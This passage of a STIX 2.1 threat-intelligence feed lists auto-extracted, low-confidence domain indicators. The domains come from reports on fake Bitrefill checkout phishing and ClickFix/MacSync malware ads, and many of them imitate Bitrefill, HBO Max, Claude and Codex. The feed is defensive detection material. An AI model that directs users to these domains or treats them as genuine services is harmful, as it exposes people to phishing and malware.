Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1ecdcdee-db91-4a33-b381-23d13c7075b2","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xn--bitrefll-q2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: .]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--b","pattern":"[domain-name:value = 'xn--bitrefll-q2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--14606f5c-6af5-4ab1-9265-cf9d7382862f","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xn--bitreill-cz9c.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pa","pattern":"[domain-name:value = 'xn--bitreill-cz9c.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d5254585-655f-4b9c-88a0-a8c288f4cd2d","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xn--bitreill-pay-yq4f.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop th","pattern":"[domain-name:value = 'xn--bitreill-pay-yq4f.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a2422a4-2555-4e7e-9cd8-67ed1f9c8a9d","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xn--btrefill-l2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: a[.]com xn--bitreill-cz9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can d","pattern":"[domain-name:value = 'xn--btrefill-l2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cb39df37-e37e-4f9a-b035-615919b0eb37","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xn--pay-bitrefll-fgb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 9c[.]com xn--bitreill-pay-yq4f[.]com xn--btrefill-l2a[.]com xn--pay-bitrefll-fgb[.]com Stop threats before they can do any harm. Malwarebytes Br","pattern":"[domain-name:value = 'xn--pay-bitrefll-fgb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c1e7113-8347-4e8a-be52-eb4db007602f","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: aforvm.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ; verse-18[.]com; lakhov[.]com; mpasvw[.]com; ouilov[.]com; aforvm[.]com AMOS helper and tasking domains Domain loop-lumen[.]com;","pattern":"[domain-name:value = 'aforvm.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d66e0a62-6483-4afa-a5f1-74462188c9a4","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: aidevmaster.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; pressureulcerlawyer[.]com; lalandscapelighting[.]com; aidevmaster[.]com; pinescope11[.]com; dogtrainersgeorgia[.]com; denverplumb","pattern":"[domain-name:value = 'aidevmaster.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9cda693f-2147-48b5-901e-9484a800a812","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: alfredaps.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ltration Domain filequanticore[.]com; filesiriuscore[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; co","pattern":"[domain-name:value = 'alfredaps.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a2a17d64-2779-4438-bb70-5b51ea6bb18c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: applediag.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: m; opendisplay[.]us Provisioning-linked lure domains Domain applediag[.]com; getnova[.]top; nova-desk[.]top; nova-fix[.]top; nova-hub","pattern":"[domain-name:value = 'applediag.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c6a5969-49a6-491d-a68f-0388165fa25e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: arkypc.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: hbubagent[.]com MacSync delivery and control domains Domain arkypc[.]com; harbor-29[.]com; fern-plume[.]com; node-slate[.]com; gro","pattern":"[domain-name:value = 'arkypc.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29d9afa7-7c6d-47c1-93b9-99a293edc5f3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: basequill9.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: Click-tracking domains Domain press29[.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekm","pattern":"[domain-name:value = 'basequill9.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34c5597a-be5c-423a-ab44-7c3f1f1ad371","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: beaocnagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: aesthetics[.]com; marbellaresales[.]com; gatemaden[.]space; beaocnagent[.]com; hbubagent[.]com MacSync delivery and control domains Dom","pattern":"[domain-name:value = 'beaocnagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c69848ea-f0cd-4394-ba1b-3296eca9de47","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bright-links.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: e[.]com; alfredaps[.]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]g","pattern":"[domain-name:value = 'bright-links.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b5949e38-d7b6-4f91-99a8-f9d0c0b27adb","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: broadwalkindia.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.]com Teardown and deli","pattern":"[domain-name:value = 'broadwalkindia.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--218011d2-f1c2-47e9-b0e2-d3969e53f5a8","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: camaligsalvatrefoils.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: -command lure domains Domain flutelikelurkerunsinewy[.]com; camaligsalvatrefoils[.]com Click-tracking domains Domain press29[.]com; leaf68[.]com","pattern":"[domain-name:value = 'camaligsalvatrefoils.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1de9331c-80cf-4b20-867d-c18857e94786","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: canvas-35.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]com; leaf68[.]com; basequill9[.]com; perchframe15[.]com; canvas-35[.]com; pine63[.]com; trekmesh15[.]com macOS loader-delivery dom","pattern":"[domain-name:value = 'canvas-35.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--65199bc9-2e45-4426-bb34-73177e01ed42","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cehamilton.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com; hindustanagency[.","pattern":"[domain-name:value = 'cehamilton.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ee23a8cd-a0ef-490e-a0ff-bb82d9e418d3","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: chatgpt-safepage.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cstoragetips[.]com Provisioning-neighborhood domains Domain chatgpt-safepage[.]com; thepullmanfolkestone[.]com; gigappyworld[.]com; microsof","pattern":"[domain-name:value = 'chatgpt-safepage.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--17a3506a-3931-48d3-b87b-d2971ff2dcc1","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cladesktop.gitlab.io","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ight-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]c","pattern":"[domain-name:value = 'cladesktop.gitlab.io']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--07d629bc-ec7b-461f-8548-3f874b72487c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: claude-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]app; codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-li","pattern":"[domain-name:value = 'claude-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--24e41417-5870-4e94-8434-7988ca2ce946","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: claud-tips.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; mu","pattern":"[domain-name:value = 'claud-tips.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e8a39761-f24f-406b-9cb2-7c41b8ddd72c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: clean-disk-guide.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: r-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--68510870-4435-4be9-803f-c27ab176929e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: clean-disk-tools.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: codex-craft[.]com; code-desktop[.]com; claude-tools[.]com; clean-disk-tools[.]com; opendisplay[.]us Provisioning-linked lure domains Domain","pattern":"[domain-name:value = 'clean-disk-tools.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ec4489b5-b66a-4dd9-a0b3-edea12ac2578","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cli-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: tes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[","pattern":"[domain-name:value = 'cli-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ca0cea0-3864-4dc4-9e7a-9e3e09d0c82e","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cli-guides.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: [.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]c","pattern":"[domain-name:value = 'cli-guides.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ffc33bef-ea10-4491-8525-472272df0658","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cli-stack.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: rofiler[.]com; cladesktop[.]gitlab[.]io; cli-desktop[.]com; cli-stack[.]com; homebrwmac-hub[.]com; clean-disk-guide[.]com Copied-comm","pattern":"[domain-name:value = 'cli-stack.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b50dbdeb-e8f9-40f7-9833-ab50903f1e3b","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: clveeragent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: heroestales[.]com; wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cos","pattern":"[domain-name:value = 'clveeragent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c274c666-ed7a-4c17-99c5-739282dec84c","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cmux-lab.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: om; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com; hbomaxx[.]app; c","pattern":"[domain-name:value = 'cmux-lab.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--824643d7-448d-44f2-8f59-6fd894ef10c1","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: code-desktop.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: raft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-desktop[.]com and six for hbomax-macos[.]com. The compromised account g","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3a3e07de-460d-400a-bf35-715e44431629","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: codex-craft.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: nts using hbomaxx[.]app, 36 developer-focused ads linked to codex-craft[.]com, 15 tied to apple.clean-disk-guide[.]com, 11 for code-des","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8774e320-963c-4e2f-8f74-0d485fc831ea","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: codex-notes.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: ]com; hbomaxx[.]us; hbomax-macos[.]com; bright-links[.]com; codex-notes[.]com; storageprofiler[.]com; cladesktop[.]gitlab[.]io; cli-des","pattern":"[domain-name:value = 'codex-notes.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52db8c06-3064-414f-81f8-745232b7eea6","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: codex-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: macdeveloperhub[.]com; macfixguide[.]com; claud-tips[.]com; codex-paths[.]com; cmux-lab[.]com; rectangleap[.]com; muse-code-ide[.]com;","pattern":"[domain-name:value = 'codex-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1092332d-30d5-4314-8bcf-835d1fbe607d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: congiagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: wantsellonline[.]com; papartybus[.]com; clveeragent[.]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; ce","pattern":"[domain-name:value = 'congiagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8f66a3ec-2746-42dc-8e50-5912f184dc5d","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: cosimcagent.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: .]com; congiagent[.]com; sgaaagent[.]com; sprieagent[.]com; cosimcagent[.]com; cehamilton[.]com; broadwalkindia[.]com; cim-kolea[.]com;","pattern":"[domain-name:value = 'cosimcagent.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-hijack-hbo-max/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3245c673-8f33-4dc8-a6db-4892ce3b27dd","created":"2026-09-15T06:56:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: crisp-paths.com","description":"Seen in \"Hackers Hijack HBO Max Reddit Account to Push 108 ClickFix Malware Ads\" (Cyber Security News). Context: abar55[.]namebright[.]bike SIC Windows-route domains Domain crisp-paths[.]com; cli-guides[.]com; macdeveloperhub[.]com; macfixguide[.]c","pattern":"[domain-name:value = 'crisp-paths.com']","pattern_type":"stix","valid_from":"2026-09-15T06:56:40.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 